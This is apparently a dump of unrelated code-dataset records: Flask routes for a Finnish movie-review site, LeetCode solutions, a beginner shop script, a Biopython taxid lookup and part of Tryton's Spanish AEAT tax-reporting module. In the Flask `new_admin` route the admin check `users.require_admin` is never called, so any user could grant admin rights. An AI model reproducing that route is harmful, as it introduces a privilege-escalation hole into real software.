id = request.form[\"id\"]\n if suggestions.suggested_movie_exists(id):\n return render_template(\"suggestions_issue.html\", message=\"Tämän niminen elokuva on jo olemassa.\")\n suggestions.accept(id)\n return redirect (\"/suggestions\")\n\n@app.route(\"/decline\", methods=[\"POST\"])\ndef decline():\n users.require_admin()\n users.check_csrf()\n id = request.form[\"id\"]\n suggestions.decline(id)\n return redirect (\"/suggestions\")\n\n@app.route(\"/delete_review\", methods=[\"POST\"])\ndef delete_review():\n users.check_csrf()\n 
id = int(request.form[\"review_id\"])\n movie_id = request.form[\"movie_id\"]\n reviews.delete_review(id)\n return redirect (\"/movie_page/\" + str(movie_id))\n\n@app.route(\"/delete_review_admin\", methods=[\"POST\"])\ndef delete_review_admin():\n users.require_admin()\n users.check_csrf()\n id = int(request.form[\"review_id\"])\n movie_id = request.form[\"movie_id\"]\n reviews.delete_review(id)\n return redirect (\"/movie_page/\" + str(movie_id))\n\n@app.route(\"/delete_my_review\", methods=[\"POST\"])\ndef delete_my_review():\n users.check_csrf()\n id = request.form[\"review_id\"]\n reviews.delete_review(id)\n return redirect (\"/my_reviews\")\n\n@app.route(\"/categories\")\ndef categories_page():\n category_list = categories.get_categories()\n return render_template(\"categories_page.html\", categories=category_list)\n\n\n@app.route(\"/category_page/\")\ndef category_page(id):\n if not categories.get_category_name(id):\n return render_template(\"issue.html\", message=\"Valitettavasti kategoriaa ei löydy\")\n category_name = categories.get_category_name(id)\n if not categories.get_category_contents(id):\n return render_template(\"empty_category.html\", category_name=category_name, id=id)\n movie_list = categories.get_category_contents(id)\n return render_template(\"category_page.html\", movies=movie_list, category_name=category_name, id=id)\n\n@app.route(\"/delete_category\", methods=[\"POST\"])\ndef delete_category():\n users.require_admin()\n users.check_csrf()\n category_id = request.form[\"category_id\"]\n categories.delete_category(category_id)\n return redirect (\"/categories\")\n\n@app.route(\"/movie_to_category\", methods=[\"POST\"])\ndef movie_to_category():\n users.require_admin()\n users.check_csrf()\n category_id = request.form[\"category_id\"]\n movie_name = request.form[\"movie_name\"]\n if categories.check_movie_in_category(movie_name, category_id):\n return render_template(\"category_issue.html\", message=\"Elokuva on jo tässä kategoriassa\", 
id=category_id)\n if not movies.check_if_movie_exists(movie_name):\n return render_template(\"category_issue.html\", message=\"Elokuvaa ei löydy\", id=category_id)\n elif categories.movie_to_category(category_id, movie_name):\n return redirect (\"/category_page/\" + str(category_id))\n else:\n return render_template(\"category_issue.html\", message=\"Elokuvan lisääminen ei onnistunut\", id=category_id)\n\n@app.route(\"/add_category\", methods=[\"POST\"])\ndef add_category():\n users.require_admin()\n users.check_csrf()\n name = request.form[\"category_name\"]\n categories.add_category(name)\n return redirect (\"/categories\")\n\n@app.route(\"/search_results\")\ndef serach_results():\n query = request.args[\"query\"]\n results = movies.search_movie(query)\n return render_template(\"search_results.html\", results=results)\n\n@app.route(\"/delete_movie\", methods=[\"POST\"])\ndef delete_movie():\n users.require_admin()\n users.check_csrf()\n movie_id = request.form[\"movie_id\"]\n movies.delete_movie(movie_id)\n return redirect(\"/\")\n\n@app.route(\"/delete_movie_from_category\", methods=[\"POST\"])\ndef delete_movie_from_category():\n users.require_admin()\n users.check_csrf()\n movie_id = request.form[\"movie_id\"]\n category_id = request.form[\"category_id\"]\n if categories.delete_movie_in_category(movie_id, category_id):\n return redirect(\"/category_page/\" + str(category_id))\n else:\n return render_template(\"category_issue.html\", message=\"Elokuvan poistaminen kategoriasta epäonnistui\", id=category_id)\n\n@app.route(\"/admins\")\ndef admins():\n users.require_admin()\n admins = users.list_admins()\n number_of_admins = users.get_number_of_admins()\n return render_template(\"admins.html\", admins=admins, number_of_admins=number_of_admins)\n\n@app.route(\"/new_admin\", methods=[\"POST\"])\ndef new_admin():\n users.require_admin\n users.check_csrf()\n username = request.form[\"username\"]\n if len(username) <= 1 or len(username) >= 20:\n return 
render_template(\"admins_issue.html\", message=\"Käyttäjätunnuksessa oltava 1-20 merkkiä\")\n if not users.username_exists_already(username):\n return render_template(\"admins_issue.html\", message=\"Käyttäjää ei löydy.\")\n if users.check_if_admin(username):\n return render_template(\"admins_issue.html\", message=\"Kyseinen käyttäjä on jo ylläpitäjä.\")\n if users.turn_user_into_admin(username):\n return redirect(\"/admins\")\n else:\n render_template(\"admins_issue.html\", message=\"Käyttäjän muuttaminen ylläpitäjäksi epäonnistui\")\n\n@app.route(\"/test\")\ndef test():\n return render_template(\"layout.html\")","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":12517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"315080775","text":"# http://oj.leetcode.com/problems/linked-list-cycle-ii/\n# http://fisherlei.blogspot.com/2013/11/leetcode-linked-list-cycle-ii-solution.html\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n\t# @param head, a ListNode\n\t# @return a list node\n\tdef detectCycle(self, head):\n\t\tif head == None:\n\t\t\treturn None\n\t\tfast = head\n\t\tslow = head\n\t\thasCycle = 0\n\t\twhile fast and fast.next:\n\t\t\tslow = slow.next\n\t\t\tfast = fast.next.next\n\t\t\tif slow == fast:\n\t\t\t\thasCycle = 1\n\t\t\t\tbreak\n\t\tif hasCycle == 0:\n\t\t\treturn None\n\t\tslow = head\n\t\twhile slow != fast:\n\t\t\tslow = slow.next\n\t\t\tfast = fast.next\n\t\treturn fast\n","sub_path":"linked-list-cycle-ii.py","file_name":"linked-list-cycle-ii.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"93623001","text":"\"\"\"\r\neasy 2021-05-18 
单调递减栈\r\n通过Stack、HashMap解决\r\n先遍历大数组nums2,首先将第一个元素入栈;\r\n继续遍历,当当前元素小于栈顶元素时,继续将它入栈;当当前元素大于栈顶元素时,栈顶元素出栈,此时应将该出栈的元素与当前元素形成key-value键值对,存入HashMap中;\r\n当遍历完nums2后,得到nums2中元素所对应的下一个更大元素的hash表;\r\n遍历nums1的元素在hashMap中去查找‘下一个更大元素’,当找不到时则为-1。\r\n\"\"\"\r\n# 2021-12-16\r\n# 寻找比当前cur大的元素-->单调递减栈\r\nclass Solution(object):\r\n def nextGreaterElement(self, nums1, nums2):\r\n stk, hashmap = [], {}\r\n # 维护单调递减栈,栈内存的是index\r\n for i in range(len(nums2)):\r\n # 如果item比栈顶元素大,则栈顶元素一定是没有用的【单调栈模板】\r\n while stk and nums2[i]>nums2[stk[-1]]:\r\n # 操作\r\n index_t = stk.pop() # # 比item大的元素就是栈顶元素\r\n hashmap[nums2[index_t]] = nums2[i]\r\n stk.append(i)\r\n\r\n # 再遍历一次nums1\r\n res = [hashmap.get(x, -1) for x in nums1]\r\n return res\r\n\r\nif __name__ == \"__main__\":\r\n nums1 = [2, 1, 3]\r\n nums2 = [2, 3, 1]\r\n myresult = Solution()\r\n print(myresult.nextGreaterElement(nums1, nums2))","sub_path":"11_单调栈/496-下一个更大元素 I.py","file_name":"496-下一个更大元素 I.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"206373159","text":"my_fruit_tuple=(\"apple\",\"banana\",\"watermelon\")\n\nmy_cost_tuple=(10,7,20)\nconsumer_number=[]\nconsumer_list=[]\nconsumer_cost=[]\nselector=int(input(\"to creat order press 1: \\nto print order press 2:\\nto exit press 3:\"))\ny=1\nz=1;\nz=0\nwhile(selector>0):\n\twhile(y>0):\n\t\tconsumer_number.append(z)\n\t\tselected_fruit=input(\"enter your fruit:\")\n\t\tselected_fruit_quantity=input(\"enter your quantity:\")\n\t\tmy_cost_tuple_counter =0\n\n\t\tfor i in my_fruit_tuple:\n\t\t\tif (i==selected_fruit) :\n\t\t\t\tconsumer_list.append(i)\n\t\t\t\tconsumer_cost.append( my_cost_tuple[my_cost_tuple_counter] *(int(selected_fruit_quantity)))\n\t\t\t\tmy_cost_tuple_counter+=1\n\t\t\t\tbreak\n\t\telse :\n\t\t\tprint(f\"sorry your {selected_fruit} fruit dosent exist\")\n\t\t\tz=z-1\t\t\t\t\n\t\tz+=1\t\t\t\n\t\tmy_cost_tuple_counter=0\n\t\ty=int(input (\"TO ADD ELEMENT--> press 
1 \\nTO EXIT --> press 0 \\n\"))\n\t\t\n\t\n\t\t\t#x=my_fruit_tuple.index(\"apple\")\n\t\t\t\n\t\t\t#consumer_cost.append(my_cost_tuple(my_fruit_tuple.index(i))*selected_fruit_quantity)\n\tselector=int(input(\"to creat order press 1: \\nto print order press 2:\\nto exit press 3:\"))\n\n\tif (selector==2):\n\t\tprint (\"_______THANK U_____\")\n\t\tprint (\"_______You bought_____\")\n\t\tprint (consumer_list)\n\t\tprint (\"_______respectively cost_____\")\n\t\tprint (consumer_cost)\n\t\ttotal_cost=0\n\t\tfor j in range (z):\n\t\t\ttotal_cost+=consumer_cost[j]\n\t\tprint (\"_______TOtal cost_____\")\n\t\tprint (f\"total cost ={total_cost}\")\n\t\tprint (\"__Let we see u again!__\")\n\ttotal_cost=0\n\t\t\t\n\t\t\n","sub_path":"lec4/assigenment.py","file_name":"assigenment.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"624194610","text":"from Bio import Phylo, Entrez\nfrom os.path import dirname, abspath\nimport csv, os\nimport pandas as pd\nimport numpy as np\nEntrez.email = 'td1515@ic.ac.uk'\n\n#~~~~~~~~~~~~~~~~~~~~~\n# GET A LIST OF NODES\n#~~~~~~~~~~~~~~~~~~~~~\n\n# define a function that makes a dictionary, node names are the heys\ndef lookup_by_names(tree):\n names = {}\n for clade in tree.find_clades():\n if clade.name:\n if clade.name in names:\n raise ValueError(\"Duplicate key: %s\" % clade.name)\n names[clade.name] = clade\n return names # spits out a dictionary where the keys are the node names, values are Clade(branch_length=value, name=same as key)\n\ntree = Phylo.read('Campylobacterota.tree', 'newick') # open the tree file \nnames = lookup_by_names(tree) # use the function to get the dictionary\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# SAVE SPECIES NAMES AND ASSEMBLY ACCESSIONS IN A TABLE\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\ntable = 'nodes-species_accession.tsv' # filename of the table\n\n#if the table already 
exists, delete it. we wanna write a new one not append to the incorrect one\nfile_exists = os.path.isfile(table)\nif file_exists:\n\tos.remove(table)\n\nwith open(table, 'w+') as acc: # make and open the table file\n\twrite = csv.writer(acc, delimiter='\\t')\n\twrite.writerow(['species', 'accession']) # put in the headers\n\tfor node in names:\n\t\tif node.find('GCF_') != -1 or node.find('GCA_') != -1: #if gcf/gca is provided\n\t\t\tspecies = ' '.join(node.split('_')[:-2])\n\t\t\tgcf = '_'.join(node.split('_')[-2:])\n\t\t\tls = [species, gcf] # split the name from the accession and save them as a list \n\t\telse: # if uba is provided\n\t\t\tspecies = ' '.join(node.split('_', 2)[:-1])\n\t\t\tuba = ''.join(node.split('_', 2)[-1])\n\t\t\tls = [species, uba] # split the name from the accession and save them as a list \n\t\twrite.writerow(ls) # write the list as a line in the csv\nprint('wrote the species+accession table')\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~\n# REOPEN FILE, ADD TAXID \n#~~~~~~~~~~~~~~~~~~~~~~~~~\n\nparentdir = dirname(dirname(dirname(abspath(__file__))))\nref = parentdir + '/datalocal/bacteria_assembly_summary_refseq_minimal.tsv'\ngen = parentdir + '/datalocal/bacteria_assembly_summary_genbank_minimal.tsv'\n\ndf = pd.read_csv(table, sep='\\t')\nrefseq = pd.read_csv(ref, sep='\\t')\ngenbank = pd.read_csv(gen, sep='\\t')\ndf = df.reindex(columns=df.columns.tolist() + ['taxid', 'species_taxid']) #add two columns to the species_accession table\n\n#define function to fetch taxid from entrez if UBA is provided:\ndef get_entrez_id(accession):\n\thandle = Entrez.esearch(db='assembly', term=accession)\n\trecord = Entrez.read(handle)\n\tids = record['IdList']\n\treturn ids\n\n#fetch summary of the assembly identified with the id, return the uba, gca, and gcf numbers.\ndef fetch_taxid(ids):\n\thandle = Entrez.esummary(db='assembly', id=ids, report='full')\n\trecord = Entrez.read(handle, validate=False)\n\tsummary = 
record['DocumentSummarySet']['DocumentSummary'][0]\n\ttaxid = summary['Taxid']\n\tspecies_taxid = summary['SpeciesTaxid']\n\treturn taxid, species_taxid\n\n\ndef find_taxid(nodes_df):\n\tfor index, gcf in nodes_df['accession'].iteritems():\n\t\tif gcf.find('GCF_') != -1: # if the accession is gcf\n\t\t\thit = refseq.loc[refseq['assembly_accession'] == gcf] #look for it in refseq\n\t\t\tif hit.empty: #if its not in refseq, find it in genbank\n\t\t\t\thit = genbank.loc[genbank['gbrs_paired_asm'] == gcf]\n\t\t\tcol1 = list(hit['taxid']) #extract the taxid and species taxid\n\t\t\tcol2 = list(hit['species_taxid']) \n\t\t\tif len(col1) != 1 or len(col2) != 1: #these two rows check for if you get more than one hit, it tells you what gcf caused this. \n\t\t\t\tprint(gcf)\n\t\t\tnodes_df.iloc[index, [2]] = col1 #append the two fields to the nodes_ data frame\n\t\t\tnodes_df.iloc[index, [3]] = col2\n\t\telif gcf.find('GCA_') != -1: #same thing for if the assembly accession is gca. but the assembly_accession and gbrs_paired_asm columns are flipped\n\t\t\thit = refseq.loc[refseq['gbrs_paired_asm'] == gcf]\n\t\t\tif hit.empty:\n\t\t\t\thit = genbank.loc[genbank['assembly_accession'] == gcf]\n\t\t\tcol1 = list(hit['taxid'])\n\t\t\tcol2 = list(hit['species_taxid'])\n\t\t\tif len(col1) != 1 or len(col2) != 1:\n\t\t\t\tprint(gcf)\n\t\t\tnodes_df.iloc[index, [2]] = col1 #append the two fields to the nodes_ data frame\n\t\t\tnodes_df.iloc[index, [3]] = col2\n\t\telse:\n\t\t\tentrez_id = get_entrez_id(gcf)\n\t\t\ttax, sp_tax = fetch_taxid(entrez_id)\n\t\t\tnodes_df.iloc[index, [2]] = tax #append the two fields to the nodes_ data frame\n\t\t\tnodes_df.iloc[index, [3]] = sp_tax\n\treturn nodes_df\n\nresult = find_taxid(df)\nresult[['taxid', 'species_taxid']] = result[['taxid', 'species_taxid']].fillna(0.0).astype(int) # change the numbers from floats to integers \n\nresult.to_csv('nodes-species_accession_taxid.tsv', sep='\\t', index=False) #save as a table\nprint('wrote the 
species+accession+taxid table')\n","sub_path":"waite-tree/get_node_names_taxids.py","file_name":"get_node_names_taxids.py","file_ext":"py","file_size_in_byte":4834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"316987765","text":"# This file is part of Tryton. The COPYRIGHT file at the top level of\n# this repository contains the full copyright notices and license terms.\nimport unicodedata\n\nfrom collections import defaultdict\nfrom dateutil.relativedelta import relativedelta\nfrom decimal import Decimal\nfrom operator import attrgetter\n\nfrom sql import Cast, Null, Literal\nfrom sql.aggregate import Count, Min, Sum\nfrom sql.conditionals import Case\nfrom sql.functions import Substring, Position, Extract, CurrentTimestamp\nfrom sql.operators import Exists\n\nfrom trytond.i18n import gettext\nfrom trytond.model import ModelSQL, ModelView, fields\nfrom trytond.model.modelsql import convert_from\nfrom trytond.pool import Pool\nfrom trytond.pyson import Eval, If\nfrom trytond.report import Report\nfrom trytond.transaction import Transaction\nfrom trytond.wizard import Wizard, StateView, StateTransition, StateReport, \\\n Button\nfrom trytond.modules.account_eu.account import ECSalesList, ECSalesListContext\n\nfrom .exceptions import PrintError\n\n# XXX fix: https://genshi.edgewall.org/ticket/582\nfrom genshi.template.astutil import ASTCodeGenerator, ASTTransformer\nif not hasattr(ASTCodeGenerator, 'visit_NameConstant'):\n def visit_NameConstant(self, node):\n if node.value is None:\n self._write('None')\n elif node.value is True:\n self._write('True')\n elif node.value is False:\n self._write('False')\n else:\n raise Exception(\"Unknown NameConstant %r\" % (node.value,))\n ASTCodeGenerator.visit_NameConstant = visit_NameConstant\nif not hasattr(ASTTransformer, 'visit_NameConstant'):\n # Re-use visit_Name because _clone is deleted\n ASTTransformer.visit_NameConstant = ASTTransformer.visit_Name\n\n\ndef 
justify(string, size):\n return string[:size].ljust(size)\n\n\ndef format_decimal(n, include_sign=False):\n if not isinstance(n, Decimal):\n n = Decimal(n)\n sign = ''\n if include_sign:\n sign = 'N' if n < 0 else ''\n return sign + ('{0:.2f}'.format(abs(n))).replace('.', '').rjust(\n 17 - len(sign), '0')\n\n\ndef format_integer(n, size=8):\n return ('%d' % n).rjust(size, '0')\n\n\ndef format_percentage(n, size=5):\n return ('{0:.2f}'.format(n)).replace('.', '').rjust(size, '0')\n\n\ndef identifier_code(identifier):\n if identifier:\n return identifier.es_code()\n return ''\n\n\ndef country_code(record):\n code = None\n if record.party_tax_identifier:\n code = record.party_tax_identifier.es_country()\n if code is None or code == 'ES':\n return ''\n return code\n\n\ndef strip_accents(s):\n return ''.join(c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn')\n\n\nclass AEATReport(Report):\n\n @classmethod\n def get_context(cls, records, data):\n pool = Pool()\n Period = pool.get('account.period')\n context = super().get_context(records, data)\n\n periods = sorted(\n Period.browse(data['periods']), key=attrgetter('start_date'))\n\n context['year'] = str(periods[0].start_date.year)\n context['company'] = periods[0].fiscalyear.company\n\n start_month = periods[0].start_date.month\n end_month = periods[-1].end_date.month\n if end_month - start_month > 0:\n context['period'] = str(end_month // 3) + 'T'\n else:\n context['period'] = str(start_month).rjust(2, '0')\n\n context['justify'] = justify\n context['format_decimal'] = format_decimal\n context['format_integer'] = format_integer\n context['format_percentage'] = format_percentage\n\n with Transaction().set_context(periods=data['periods']):\n context['amounts'] = cls.compute_amounts()\n\n return context\n\n @classmethod\n def compute_amounts(cls):\n amounts = defaultdict(Decimal)\n for tax_code in cls.tax_codes():\n amounts[tax_code.code] += tax_code.amount\n return amounts\n\n @classmethod\n 
def tax_codes(cls):\n pool = Pool()\n TaxCode = pool.get('account.tax.code')\n return TaxCode.search([('aeat_report', '=', cls._aeat_report)])\n\n\nclass AEATPartyReport(AEATReport):\n\n @classmethod\n def aeat_party_expression(cls, tables):\n '''\n Returns a couple of sql expression and tables used by sql query to\n compute the aeat party.\n '''\n pool = Pool()\n Invoice = pool.get('account.invoice')\n\n table, _ = tables[None]\n is_invoice = table.origin.like(Invoice.__name__ + ',%')\n\n if 'invoice' in tables:\n invoice, _ = tables['invoice']\n else:\n invoice = Invoice.__table__()\n tables['invoice'] = {\n None: (invoice, (is_invoice\n & (invoice.id == Cast(\n Substring(table.origin,\n Position(',', table.origin) + Literal(1)),\n Invoice.id.sql_type().base)))),\n }\n\n return Case((is_invoice, invoice.party), else_=Null), tables\n\n @classmethod\n def get_context(cls, records, data):\n pool = Pool()\n Move = pool.get('account.move')\n Line = pool.get('account.move.line')\n TaxLine = pool.get('account.tax.line')\n Tax = pool.get('account.tax')\n\n context = super().get_context(records, data)\n cursor = Transaction().connection.cursor()\n\n move = Move.__table__()\n move_line = Line.__table__()\n tax_line = TaxLine.__table__()\n\n tables = {\n None: (move, None),\n 'lines': {\n None: (move_line, move_line.move == move.id),\n 'tax_lines': {\n None: (tax_line, tax_line.move_line == move_line.id),\n },\n },\n }\n\n expression, tables = cls.aeat_party_expression(tables)\n\n parties = defaultdict(int)\n for tax_code in cls.tax_codes():\n domain = ['OR']\n for line in tax_code.lines:\n domain.append(line._line_domain)\n\n with Transaction().set_context(periods=data['periods']):\n tax_line_domain = [Tax._amount_domain(), domain]\n _, where = Move.search_domain([\n ('lines', 'where', [\n ('tax_lines', 'where', tax_line_domain),\n ]),\n ], tables=tables)\n\n from_ = convert_from(None, tables)\n cursor.execute(*from_.select(\n expression, where=where, 
group_by=(expression,)).select(\n Count(Literal('*'))))\n row = cursor.fetchone()\n if row:\n parties[tax_code.code] += row[0]\n context['parties'] = parties\n return context\n\n\nclass AEAT111(AEATPartyReport):\n __name__ = 'account.reporting.aeat111'\n _aeat_report = '111'\n\n @classmethod\n def get_context(cls, records, data):\n context = super().get_context(records, data)\n amounts = context['amounts']\n for code in ['28', '30']:\n assert code not in amounts, (\n \"computed code %s already defined\" % code)\n amounts['28'] = (amounts['03'] + amounts['06'] + amounts['09']\n + amounts['12'] + amounts['15'] + amounts['18'] + amounts['21']\n + amounts['24'] + amounts['27'])\n amounts['30'] = amounts['28'] - amounts['29']\n return context\n\n\nclass AEAT115(AEATPartyReport):\n __name__ = 'account.reporting.aeat115'\n _aeat_report = '115'\n\n @classmethod\n def get_context(cls, records, data):\n context = super().get_context(records, data)\n amounts = context['amounts']\n assert '05' not in amounts, (\n \"computed code 05 already defined\")\n amounts['05'] = amounts['03'] - amounts['04']\n return context\n\n\nclass AEAT303(AEATReport):\n __name__ = 'account.reporting.aeat303'\n _aeat_report = '303'\n\n @classmethod\n def compute_amounts(cls):\n amounts = super().compute_amounts()\n amounts['65'] = 100.0\n return amounts\n\n @classmethod\n def get_context(cls, records, data):\n pool = Pool()\n Period = pool.get('account.period')\n Account = pool.get('account.account')\n TaxCodeLine = pool.get('account.tax.code.line')\n transaction = Transaction()\n context = super().get_context(records, data)\n amounts = context['amounts']\n\n periods = Period.browse(data['periods'])\n start_date = periods[0].start_date\n end_date = periods[-1].end_date\n\n lines = TaxCodeLine.search([\n ('code', 'in', cls.tax_codes()),\n ('code.code', 'in', ['03', '06', '09', '18', '21', '24']),\n ('tax', 'where', [\n ('type', '=', 'percentage'),\n ['OR',\n ('start_date', '=', None),\n ('start_date', 
'<=', end_date),\n ],\n ['OR',\n ('end_date', '=', None),\n ('end_date', '>=', start_date),\n ],\n ]),\n ])\n for line in lines:\n code = str(int(line.code.code) - 1).rjust(2, '0')\n amounts[code] = float(line.tax.rate * Decimal(100))\n\n amount_to_compensate = Decimal(0)\n fiscalyear = periods[0].fiscalyear\n with transaction.set_context({\n 'fiscalyear': fiscalyear.id,\n 'to_date': end_date,\n }):\n for account in Account.search([\n ('company', '=', fiscalyear.company.id),\n ('code', 'like', '4700%'),\n ]):\n amount_to_compensate += account.balance\n\n for code in ['46', '64', '66', '67', '69', '71', '88']:\n assert code not in amounts, (\n \"computed code %s already defined\" % code)\n amounts['46'] = amounts['27'] - amounts['45']\n amounts['64'] = amounts['46'] + amounts['58'] + amounts['76']\n amounts['66'] = amounts['64'] * Decimal(amounts['65']) / Decimal(100.0)\n amounts['67'] = amount_to_compensate\n amounts['69'] = (amounts['66'] + amounts['77'] - amounts['67']\n + amounts['68'])\n amounts['71'] = (amounts['69'] - amounts['70'])\n amounts['88'] = (amounts['80'] + amounts['81'] - amounts['93']\n + amounts['94'] + amounts['83'] + amounts['84'] + amounts['85']\n + amounts['86'] + amounts['95'] + amounts['96'] + amounts['97']\n + amounts['98'] - amounts['79'] - amounts['99'])\n\n last_period = [p for p in periods[0].fiscalyear.periods\n if p.type == 'standard'][-1]\n declaration_type = 'N'\n if amounts['69'] > 0:\n declaration_type = 'I'\n elif amounts['69'] < 0:\n declaration_type = 'D' if last_period in periods else 'C'\n context['declaration_type'] = declaration_type\n return context\n\n\nclass PrintAEATStart(ModelView):\n 'Print AEAT Start'\n __name__ = 'account.reporting.aeat.start'\n\n report = fields.Selection([\n ('111', \"Model 111\"),\n ('115', \"Model 115\"),\n ('303', \"Model 303\"),\n ], \"Report\", required=True)\n periods = fields.Many2Many('account.period', None, None, 'Periods',\n required=True)\n\n\nclass PrintAEAT(Wizard):\n 'Print AEAT'\n 
__name__ = 'account.reporting.aeat'\n start = StateView('account.reporting.aeat.start',\n 'account_es.print_aeat_start_view_form', [\n Button('Cancel', 'end', 'tryton-cancel'),\n Button('Print', 'choice', 'tryton-ok', default=True),\n ])\n choice = StateTransition()\n model_111 = StateReport('account.reporting.aeat111')\n model_115 = StateReport('account.reporting.aeat115')\n model_303 = StateReport('account.reporting.aeat303')\n\n def transition_choice(self):\n validate = getattr(self, 'validate_%s' % self.start.report, None)\n if validate:\n validate()\n return 'model_%s' % self.start.report\n\n def open_report(self, action):\n return action, {'periods': [p.id for p in self.start.periods]}\n\n do_model_111 = open_report\n do_model_115 = open_report\n do_model_303 = open_report\n\n def validate_303(self):\n if len(set(p.fiscalyear for p in self.start.periods)) > 1:\n raise PrintError(\n gettext('account_es.msg_report_same_fiscalyear'))\n\n\nclass ESVATList(ModelSQL, ModelView):\n \"Spanish VAT List\"\n __name__ = 'account.reporting.vat_list_es'\n\n company_tax_identifier = fields.Many2One(\n 'party.identifier', \"Company Tax Identifier\")\n party_tax_identifier = fields.Many2One(\n 'party.identifier', \"Party Tax Identifier\")\n party = fields.Many2One('party.party', \"Party\")\n province_code = fields.Function(fields.Char(\"Province Code\"),\n 'get_province_code', searcher='search_province_code')\n code = fields.Char(\"Code\")\n amount = fields.Numeric(\n \"Amount\", digits=(16, Eval('currency_digits', 2)),\n depends=['currency_digits'])\n first_period_amount = fields.Numeric(\n \"First Period Amount\", digits=(16, Eval('currency_digits', 2)),\n depends=['currency_digits'])\n second_period_amount = fields.Numeric(\n \"Second Period Amount\", digits=(16, Eval('currency_digits', 2)),\n depends=['currency_digits'])\n third_period_amount = fields.Numeric(\n \"Third Period Amount\", digits=(16, Eval('currency_digits', 2)),\n depends=['currency_digits'])\n 
fourth_period_amount = fields.Numeric(\n \"Fourth Period Amount\", digits=(16, Eval('currency_digits', 2)),\n depends=['currency_digits'])\n currency = fields.Many2One('currency.currency', \"Currency\")\n currency_digits = fields.Function(\n fields.Integer(\"Currency Digits\"), 'get_currency_digits')\n\n def get_currency_digits(self, name):\n return self.currency.digits\n\n @classmethod\n def get_province_code(cls, records, name):\n return {r.id: r.party.es_province_code or '' if r.party else ''\n for r in records}\n\n @classmethod\n def search_province_code(cls, name, clause):\n return [(('party.es_province_code',) + tuple(clause[1:]))]\n\n @classmethod\n def excluded_tax_codes(cls):\n return ['111', '115']\n\n @classmethod\n def table_query(cls):\n pool = Pool()\n Company = pool.get('company.company')\n Invoice = pool.get('account.invoice')\n InvoiceTax = pool.get('account.invoice.tax')\n Move = pool.get('account.move')\n Line = pool.get('account.move.line')\n TaxLine = pool.get('account.tax.line')\n Tax = pool.get('account.tax')\n TaxCode = pool.get('account.tax.code')\n TaxCodeLine = pool.get('account.tax.code.line')\n Date = pool.get('ir.date')\n context = Transaction().context\n company = Company.__table__()\n invoice = Invoice.__table__()\n cancel_invoice = Invoice.__table__()\n move = Move.__table__()\n line = Line.__table__()\n tax_line = TaxLine.__table__()\n tax = Tax.__table__()\n tax_code = TaxCode.__table__()\n tax_code_line = TaxCodeLine.__table__()\n exclude_invoice_tax = InvoiceTax.__table__()\n\n amount = tax_line.amount\n month = Extract('MONTH', invoice.invoice_date)\n\n excluded_taxes = (tax_code_line\n .join(tax_code,\n condition=(tax_code.id == tax_code_line.code)\n ).select(\n tax_code_line.tax, distinct=True,\n where=tax_code.aeat_report.in_(cls.excluded_tax_codes())))\n\n where = ((invoice.company == context.get('company'))\n & (invoice.state.in_(['posted', 'paid']))\n & (tax.es_vat_list_code != Null)\n & (Extract('year', 
invoice.invoice_date)\n == context.get('date', Date.today()).year)\n & ~Exists(cancel_invoice.select(\n cancel_invoice.cancel_move, distinct=True,\n where=(cancel_invoice.cancel_move == invoice.move)))\n # Use exists to exclude the full invoice when it has multiple taxes\n & ~Exists(exclude_invoice_tax.select(\n exclude_invoice_tax.invoice,\n where=((exclude_invoice_tax.invoice == invoice.id)\n & (exclude_invoice_tax.tax.in_(excluded_taxes))))))\n return (tax_line\n .join(tax, condition=tax_line.tax == tax.id)\n .join(line, condition=tax_line.move_line == line.id)\n .join(move, condition=line.move == move.id)\n .join(invoice, condition=invoice.move == move.id)\n .join(company, condition=company.id == invoice.company)\n .select(\n Min(tax_line.id).as_('id'),\n Literal(0).as_('create_uid'),\n CurrentTimestamp().as_('create_date'),\n cls.write_uid.sql_cast(Literal(Null)).as_('write_uid'),\n cls.write_date.sql_cast(Literal(Null)).as_('write_date'),\n invoice.tax_identifier.as_('company_tax_identifier'),\n invoice.party.as_('party'),\n invoice.party_tax_identifier.as_('party_tax_identifier'),\n tax.es_vat_list_code.as_('code'),\n Sum(amount).as_('amount'),\n Sum(amount, filter_=month <= Literal(3)).as_(\n 'first_period_amount'),\n Sum(amount, filter_=(\n (month > Literal(3)) & (month <= Literal(6)))).as_(\n 'second_period_amount'),\n Sum(amount, filter_=(\n (month > Literal(6)) & (month <= Literal(9)))).as_(\n 'third_period_amount'),\n Sum(amount, filter_=(\n (month > Literal(9)) & (month <= Literal(12)))).as_(\n 'fourth_period_amount'),\n company.currency.as_('currency'),\n where=where,\n group_by=[\n invoice.tax_identifier,\n invoice.type,\n invoice.party,\n invoice.party_tax_identifier,\n company.currency,\n tax.es_vat_list_code,\n ]))\n\n\nclass ESVATListContext(ModelView):\n \"Spanish VAT List Context\"\n __name__ = 'account.reporting.vat_list_es.context'\n\n company = fields.Many2One('company.company', \"Company\", required=True)\n date = fields.Date(\"Date\", 
